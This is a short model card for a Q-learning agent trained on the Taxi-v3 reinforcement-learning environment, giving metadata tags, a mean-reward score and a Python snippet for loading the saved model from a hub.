- Taxi-v3
- q-learning
- reinforcement-learning
- custom-implementation
model-index:
- name: q_Taxi-v3-v1
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: Taxi-v3
type: Taxi-v3
metrics:
- type: mean_reward
value: 7.56 +/- 2.71
name: mean_reward
verified: false
---
# **Q-Learning** Agent playing1 **Taxi-v3**
This is a trained model of a **Q-Learning** agent playing **Taxi-v3** .
## Usage
```python
model = load_from_hub(repo_id="archishin/q_Taxi-v3-v1", filename="q-learning.pkl")
# Don't forget to check if you need to add additional attributes (is_slippery=False etc)
env = gym.make(model["env_id"])
```
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.